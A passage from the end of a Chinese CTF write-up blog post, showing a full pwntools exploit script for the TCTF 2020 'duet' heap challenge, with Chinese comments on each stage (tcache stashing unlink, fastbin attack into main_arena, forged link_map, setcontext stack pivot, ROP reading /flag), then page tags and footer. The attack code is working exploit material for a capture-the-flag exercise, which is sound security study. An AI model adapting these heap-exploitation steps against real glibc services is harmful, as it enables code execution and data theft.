class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding:utf-8 -*-</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="comment">#context.log_level = &#x27;debug&#x27;</span></span><br><span class="line"><span class="comment">#sh = process(&#x27;./duet&#x27;)</span></span><br><span class="line">sh = remote(<span class="string">&#x27;pwnable.org&#x27;</span>,<span class="number">12356</span>)</span><br><span class="line">libc = ELF(<span class="string">&#x27;/usr/lib/x86_64-linux-gnu/libc-2.29.so&#x27;</span>)</span><br><span class="line">malloc_hook_s = libc.sym[<span class="string">&#x27;__malloc_hook&#x27;</span>]</span><br><span class="line"><span class="comment">#l_addr_offset = 0x222190</span></span><br><span class="line">l_addr_offset = <span class="number">0x21b190</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">add</span>(<span class="params">index, size, content</span>):</span><br><span class="line">    sh.sendlineafter(<span class="string">&#x27;: &#x27;</span>, <span class="string">&#x27;1&#x27;</span>)</span><br><span class="line">    <span class="keyword">if</span>(index == <span class="number">0</span>):</span><br><span class="line">        sh.sendlineafter(<span class="string">&#x27;Instrument: &#x27;</span>, <span class="string">&#x27;琴&#x27;</span>)</span><br><span class="line">    <span class="keyword">elif</span>(index == <span class="number">1</span>):</span><br><span class="line">        sh.sendlineafter(<span class="string">&#x27;Instrument: &#x27;</span>, <span class="string">&#x27;瑟&#x27;</span>)</span><br><span class="line">    sh.sendlineafter(<span class="string">&#x27;Duration: &#x27;</span>, <span class="built_in">str</span>(size))</span><br><span class="line">    sh.sendafter(<span class="string">&#x27;Score: &#x27;</span>, content)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">delete</span>(<span class="params">index</span>):</span><br><span class="line">    sh.sendlineafter(<span class="string">&#x27;: &#x27;</span>, <span class="string">&#x27;2&#x27;</span>)</span><br><span class="line">    <span class="keyword">if</span>(index == <span class="number">0</span>):</span><br><span class="line">        sh.sendlineafter(<span class="string">&#x27;Instrument: &#x27;</span>, <span class="string">&#x27;琴&#x27;</span>)</span><br><span class="line">    <span class="keyword">elif</span>(index == <span class="number">1</span>):</span><br><span class="line">        sh.sendlineafter(<span class="string">&#x27;Instrument: &#x27;</span>, <span class="string">&#x27;瑟&#x27;</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">show</span>(<span class="params">index</span>):</span><br><span class="line">    sh.sendlineafter(<span class="string">&#x27;: &#x27;</span>, <span class="string">&#x27;3&#x27;</span>)</span><br><span class="line">    <span class="keyword">if</span>(index == <span class="number">0</span>):</span><br><span class="line">        sh.sendlineafter(<span class="string">&#x27;Instrument: &#x27;</span>, <span class="string">&#x27;琴&#x27;</span>)</span><br><span class="line">    <span class="keyword">elif</span>(index == <span class="number">1</span>):</span><br><span class="line">        sh.sendlineafter(<span class="string">&#x27;Instrument: &#x27;</span>, <span class="string">&#x27;瑟&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">backdoor</span>(<span class="params">size</span>):</span><br><span class="line">    sh.sendlineafter(<span class="string">&#x27;: &#x27;</span>, <span class="string">&#x27;5&#x27;</span>)</span><br><span class="line">    sh.sendlineafter(<span class="string">&#x27;: &#x27;</span>, <span class="built_in">str</span>(size))</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">6</span>):</span><br><span class="line">    add(<span class="number">0</span>, <span class="number">0x80</span>, <span class="string">&#x27;a&#x27;</span> * <span class="number">0x80</span>)</span><br><span class="line">    delete(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">7</span>):</span><br><span class="line">    add(<span class="number">0</span>, <span class="number">0xd0</span>, <span class="string">&#x27;a&#x27;</span> * <span class="number">0xd0</span>)</span><br><span class="line">    delete(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">7</span>):</span><br><span class="line">    add(<span class="number">0</span>, <span class="number">0x230</span>, <span class="string">&#x27;a&#x27;</span> * <span class="number">0x230</span>)</span><br><span class="line">    delete(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">7</span>):</span><br><span class="line">    add(<span class="number">0</span>, <span class="number">0x280</span>, <span class="string">&#x27;a&#x27;</span> * <span class="number">0x280</span>)</span><br><span class="line">    delete(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">7</span>):</span><br><span class="line">    add(<span class="number">0</span>, <span class="number">0x2f8</span>, <span class="string">&#x27;a&#x27;</span> * <span class="number">0x2f8</span>)</span><br><span class="line">    delete(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">7</span>):</span><br><span class="line">    add(<span class="number">0</span>, <span class="number">0x3f8</span>, <span class="string">&#x27;a&#x27;</span> * <span class="number">0x3f8</span>)</span><br><span class="line">    delete(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">7</span>):</span><br><span class="line">    add(<span class="number">0</span>, <span class="number">0xf0</span>, <span class="string">&#x27;a&#x27;</span> * <span class="number">0xf0</span>)</span><br><span class="line">    delete(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="number">0</span>, <span class="number">0x2f8</span>, <span class="string">&#x27;a&#x27;</span> * <span class="number">0x2f8</span>)</span><br><span class="line">add(<span class="number">1</span>, <span class="number">0x3f8</span>, <span class="string">&#x27;b&#x27;</span> * <span class="number">0x70</span> + p64(<span class="number">0x2f0</span>) + p64(<span class="number">0x20</span>) + <span class="string">&#x27;f&#x27;</span> * (<span class="number">0x280</span> - <span class="number">0x80</span>) + (p64(<span class="number">0</span>) + p64(<span class="number">0x21</span>)) * <span class="number">7</span> + p64(<span class="number">0x300</span>) + p64(<span class="number">0x21</span>) + p64(<span class="number">0x21</span>) * <span class="built_in">int</span>((<span class="number">0x3f8</span> - <span class="number">0x300</span>)/<span class="number">8</span>))</span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line"><span class="comment"># delete(1)</span></span><br><span class="line">backdoor(<span class="number">0xf1</span>)</span><br><span class="line">add(<span class="number">0</span>, <span class="number">0x280</span>, <span class="string">&#x27;c&#x27;</span> * <span class="number">0x268</span> + p64(<span class="number">0x301</span>) + <span class="string">&#x27;d&#x27;</span> * <span class="number">0x10</span>)</span><br><span class="line">show(<span class="number">1</span>)</span><br><span class="line">sh.recvuntil(<span class="string">&#x27;d&#x27;</span> * <span class="number">0x10</span>)</span><br><span class="line">sh.recvn(<span class="number">0x10</span>)</span><br><span class="line">main_arena_xx = u64(sh.recv(<span class="number">6</span>).ljust(<span class="number">0x8</span>,<span class="string">&#x27;\x00&#x27;</span>))</span><br><span class="line">malloc_hook_addr = (main_arena_xx &amp; <span class="number">0xFFFFFFFFFFFFF000</span>) + (malloc_hook_s &amp; <span class="number">0xFFF</span>)</span><br><span class="line">libc_base = malloc_hook_addr - malloc_hook_s</span><br><span class="line">open_addr = libc_base + libc.sym[<span class="string">&#x27;open&#x27;</span>]</span><br><span class="line">read_addr = libc_base + libc.sym[<span class="string">&#x27;read&#x27;</span>]</span><br><span class="line">write_addr = libc_base + libc.sym[<span class="string">&#x27;write&#x27;</span>]</span><br><span class="line">pop_rax = libc_base + <span class="number">0x0000000000047cf8</span></span><br><span class="line">pop_rdi = libc_base + <span class="number">0x0000000000026542</span></span><br><span class="line">pop_rsi = libc_base + <span class="number">0x0000000000026f9e</span></span><br><span class="line">pop_rdx = libc_base + <span class="number">0x000000000012bda6</span></span><br><span class="line">syscall_ret = read_addr + <span class="number">0xF</span></span><br><span class="line">ret = libc_base + <span class="number">0x000000000002535f</span></span><br><span class="line">bss = libc_base + libc.bss()</span><br><span class="line">global_fast_max = libc_base + <span class="number">0x1e7600</span></span><br><span class="line"><span class="built_in">print</span> <span class="built_in">hex</span>(main_arena_xx)</span><br><span class="line"><span class="built_in">print</span> <span class="string">&#x27;libc_base=&#x27;</span>,<span class="built_in">hex</span>(libc_base)</span><br><span class="line"><span class="built_in">print</span> <span class="string">&#x27;global_fast_max=&#x27;</span>,<span class="built_in">hex</span>(global_fast_max)</span><br><span class="line">libc_addr = libc_base</span><br><span class="line"><span class="comment"># pause()</span></span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">delete(<span class="number">1</span>)</span><br><span class="line">add(<span class="number">1</span>, <span class="number">0x200</span>, <span class="string">&#x27;h&#x27;</span> * <span class="number">0x200</span>)</span><br><span class="line">add(<span class="number">0</span>, <span class="number">0x260</span>, p64(<span class="number">0x21</span>) * (<span class="number">0x46</span>+<span class="number">6</span>))</span><br><span class="line">delete(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">add(<span class="number">1</span>, <span class="number">0xd0</span>, <span class="string">&#x27;s&#x27;</span> * <span class="number">0x50</span> + p64(<span class="number">0</span>) + p64(<span class="number">0x241</span>) + <span class="string">&#x27;s&#x27;</span> * <span class="number">0x70</span>)</span><br><span class="line"><span class="comment"># pause()</span></span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">show(<span class="number">1</span>)</span><br><span class="line">sh.recvuntil(<span class="string">&#x27;s&#x27;</span> * <span class="number">0x50</span>)</span><br><span class="line">sh.recvn(<span class="number">0x10</span>)</span><br><span class="line">heap_addr = u64(sh.recvn(<span class="number">8</span>))</span><br><span class="line">success(<span class="string">&#x27;heap_addr: &#x27;</span> + <span class="built_in">hex</span>(heap_addr))</span><br><span class="line">add(<span class="number">0</span>, <span class="number">0x1a0</span>, <span class="string">&#x27;u&#x27;</span> * <span class="number">0x70</span> + p64(<span class="number">0</span>) + p64(<span class="number">0x21</span>) + <span class="string">&#x27;u&#x27;</span> * <span class="number">0x120</span>)</span><br><span class="line">delete(<span class="number">1</span>)</span><br><span class="line">add(<span class="number">1</span>, <span class="number">0xd0</span>, <span class="string">&#x27;q&#x27;</span> * <span class="number">0x50</span> + p64(<span class="number">0</span>) + p64(<span class="number">0x291</span>) + <span class="string">&#x27;q&#x27;</span> * <span class="number">0x70</span>)</span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line"><span class="comment"># pause()</span></span><br><span class="line">add(<span class="number">0</span>, <span class="number">0x280</span>, <span class="string">&#x27;w&#x27;</span> * <span class="number">0x70</span> + p64(<span class="number">0x21</span>) * <span class="number">6</span> + <span class="string">&#x27;w&#x27;</span> * <span class="number">0x100</span> + p64(<span class="number">0</span>) + p64(<span class="number">0x101</span>) + p64(heap_addr) + p64(libc_addr + <span class="number">0x1e7600</span> + <span class="number">4</span> - <span class="number">0x10</span>) + <span class="string">&#x27;w&#x27;</span> * (<span class="number">0x250</span> - <span class="number">0x1b0</span>) + p64(<span class="number">0</span>) + p64(<span class="number">0x101</span>) + p64(libc_addr + <span class="number">0x1e4d20</span>) + p64(heap_addr - <span class="number">0xc0</span>))</span><br><span class="line"><span class="comment"># libc_addr + 0x1e7600 - 0x10 + 4</span></span><br><span class="line"><span class="comment"># delete(0)</span></span><br><span class="line">delete(<span class="number">1</span>)</span><br><span class="line">add(<span class="number">1</span>, <span class="number">0xd0</span>, <span class="string">&#x27;q&#x27;</span> * <span class="number">0x50</span> + p64(<span class="number">0</span>) + p64(<span class="number">0x401</span>) + <span class="string">&#x27;q&#x27;</span> * <span class="number">0x70</span>)</span><br><span class="line">delete(<span class="number">1</span>)</span><br><span class="line">add(<span class="number">1</span>, <span class="number">0x3f0</span>, p64(<span class="number">0x21</span>) * <span class="built_in">int</span>(<span class="number">0x3f0</span>/<span class="number">8</span>))</span><br><span class="line">delete(<span class="number">1</span>)</span><br><span class="line">add(<span class="number">1</span>, <span class="number">0x80</span>, <span class="string">&#x27;a&#x27;</span> * <span class="number">0x80</span>) <span class="comment">#触发Tcache Stashing Unlink Attack</span></span><br><span class="line">delete(<span class="number">0</span>) <span class="comment">#接下来，这个chunk被放入fastbin，在main_arena留下一个1，这个1可以用来伪造fastbin的size</span></span><br><span class="line">delete(<span class="number">1</span>)</span><br><span class="line">add(<span class="number">0</span>, <span class="number">0x3f0</span>, <span class="string">&#x27;o&#x27;</span> * <span class="number">0x260</span> + p64(<span class="number">0</span>) + p64(<span class="number">0x101</span>) + p64(libc_addr + <span class="number">0x1e4c3F</span>) + p64(<span class="number">0</span>) + p64(<span class="number">0x21</span>) * <span class="built_in">int</span>((<span class="number">0x3f0</span> - <span class="number">0x280</span>)/<span class="number">8</span>)) <span class="comment">#将main_arena里伪造fastbin链接到现有的fastbin里</span></span><br><span class="line"><span class="comment"># pause()</span></span><br><span class="line">add(<span class="number">1</span>, <span class="number">0xf0</span>, <span class="string">&#x27;a&#x27;</span> * <span class="number">0xf0</span>)</span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">payload =  <span class="string">&#x27;z&#x27;</span> * <span class="number">0x1</span> + <span class="string">&#x27;\x00&#x27;</span> * <span class="number">0x50</span> + p64(libc_addr + l_addr_offset - <span class="number">0x14</span>) <span class="comment">#top chunk指向linkmap-&gt;l_addr附近</span></span><br><span class="line">payload += p64(<span class="number">0</span>) + p64(libc_addr + <span class="number">0x1e4ca0</span>)*<span class="number">2</span>  <span class="comment">#修复unsorted bin</span></span><br><span class="line">payload += p64(libc_addr + <span class="number">0x1e4cb0</span>)*<span class="number">2</span> + p64(libc_addr + <span class="number">0x1e4cc0</span>)*<span class="number">2</span> + p64(libc_addr + <span class="number">0x1e4cd0</span>)*<span class="number">2</span></span><br><span class="line">payload += p64(libc_addr + <span class="number">0x1e4ce0</span>)*<span class="number">2</span> + p64(libc_addr + <span class="number">0x1e4cf0</span>)*<span class="number">2</span> + p64(libc_addr + <span class="number">0x1e4d00</span>)*<span class="number">2</span> + p64(libc_addr + <span class="number">0x1e4d10</span>)*<span class="number">2</span>  + p64(<span class="number">0</span>)*<span class="number">2</span></span><br><span class="line">add(<span class="number">0</span>, <span class="number">0xf1</span>,payload) <span class="comment">#fastbin attack申请到main_arena里，控制main_arena</span></span><br><span class="line">delete(<span class="number">1</span>)</span><br><span class="line">setcontext_addr = libc_addr + libc.sym[<span class="string">&#x27;setcontext&#x27;</span>]</span><br><span class="line"></span><br><span class="line"><span class="comment">#伪造link_map</span></span><br><span class="line">payload = <span class="string">&#x27;\x00&#x27;</span>*<span class="number">0x4</span></span><br><span class="line">payload += p64(libc_base + l_addr_offset + <span class="number">0x20</span>) <span class="comment">#fini_array的基址</span></span><br><span class="line">payload += <span class="string">&#x27;\x00&#x27;</span>*<span class="number">0x10</span></span><br><span class="line">payload += p64(libc_base + l_addr_offset + <span class="number">0x5A0</span>)</span><br><span class="line">payload += p64(<span class="number">0</span>)</span><br><span class="line">payload += p64(libc_addr + l_addr_offset)</span><br><span class="line"><span class="comment">#此处，伪造一系列需要执行的函数虚表</span></span><br><span class="line"></span><br><span class="line">payload += p64(setcontext_addr + <span class="number">0x35</span>) <span class="comment">#函数1，setcontext做栈迁移</span></span><br><span class="line">payload += p64(ret) <span class="comment">#函数0，使得rdx指向link_map内部</span></span><br><span class="line"></span><br><span class="line"><span class="comment">#这里布置rop，正好0x90</span></span><br><span class="line">rop= p64(<span class="number">0</span>) + p64(pop_rsi) + p64(libc_base + l_addr_offset + <span class="number">0x70</span>) + p64(pop_rdx) + p64(<span class="number">0x100</span>) + p64(read_addr)</span><br><span class="line">rop = rop.ljust(<span class="number">0x90</span>,<span class="string">&#x27;a&#x27;</span>)</span><br><span class="line">payload += rop</span><br><span class="line"><span class="comment">#这里布置rsp</span></span><br><span class="line">payload += p64(libc_base + l_addr_offset + <span class="number">0x40</span>)</span><br><span class="line"><span class="comment">#这里布置[rdx+0xA8]</span></span><br><span class="line">payload += p64(pop_rdi)</span><br><span class="line"></span><br><span class="line">payload = payload.ljust(<span class="number">0x114</span>,<span class="string">&#x27;a&#x27;</span>)</span><br><span class="line">payload += p64(libc_addr + l_addr_offset + <span class="number">0x110</span>) <span class="comment">##fini_array的偏移的指针</span></span><br><span class="line">payload += p64(<span class="number">0</span>) <span class="comment">##fini_array的偏移</span></span><br><span class="line">payload += p64(libc_addr + l_addr_offset + <span class="number">0x120</span>) <span class="comment">#函数个数变量的指针</span></span><br><span class="line">payload += p64(<span class="number">0x20</span>) <span class="comment">#函数个数</span></span><br><span class="line"></span><br><span class="line">payload = payload.ljust(<span class="number">0x1E0</span>,<span class="string">&#x27;a&#x27;</span>)</span><br><span class="line">add(<span class="number">1</span>,<span class="number">0x1E0</span>,payload)</span><br><span class="line"><span class="comment">#执行rop，输入后续的主rop</span></span><br><span class="line">sh.sendlineafter(<span class="string">&#x27;:&#x27;</span>,<span class="string">&#x27;6&#x27;</span>)</span><br><span class="line"></span><br><span class="line">flag_str = libc_addr + l_addr_offset + <span class="number">0x118</span></span><br><span class="line">rop = p64(pop_rdi) + p64(flag_str) + p64(pop_rsi) + p64(<span class="number">0</span>) + p64(pop_rax) + p64(<span class="number">0x2</span>) + p64(syscall_ret)</span><br><span class="line">rop += p64(pop_rdi) + p64(<span class="number">3</span>) + p64(pop_rsi) + p64(bss) + p64(pop_rdx) + p64(<span class="number">0x30</span>) + p64(read_addr)</span><br><span class="line">rop += p64(pop_rdi) + p64(<span class="number">1</span>) + p64(pop_rsi) + p64(bss) + p64(pop_rdx) + p64(<span class="number">0x30</span>) + p64(write_addr)</span><br><span class="line">rop += <span class="string">&#x27;/flag\x00&#x27;</span></span><br><span class="line">sh.sendline(rop)</span><br><span class="line"></span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>
    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E/" rel="tag"># 格式化字符串漏洞</a>
              <a href="/tags/fastbin/" rel="tag"># fastbin</a>
              <a href="/tags/Tcache-Stashing-Unlink-Attack/" rel="tag"># Tcache_Stashing_Unlink_Attack</a>
              <a href="/tags/linkmap/" rel="tag"># linkmap</a>
              <a href="/tags/dl-resolve/" rel="tag"># dl_resolve</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/07/26/zer0pts_2020_babybof/" rel="prev" title="zer0pts_2020_babybof（一种在FULL RELRO情况下无泄漏的getshell方法）">
      <i class="fa fa-chevron-left"></i> zer0pts_2020_babybof（一种在FULL RELRO情况下无泄漏的getshell方法）
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/07/26/n1ctf2018_null/" rel="next" title="n1ctf2018_null（通过劫持线程arena达到任意地址分配）">
      n1ctf2018_null（通过劫持线程arena达到任意地址分配） <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#inndy-echo3"><span class="nav-number">1.</span> <span class="nav-text">inndy_echo3</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#TCTF-2020-duet"><span class="nav-number">2.</span> <span class="nav-text">TCTF 2020 duet</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">ha1vk</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">234</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">147</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2025</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">ha1vk</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>


        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

</body>
</html>
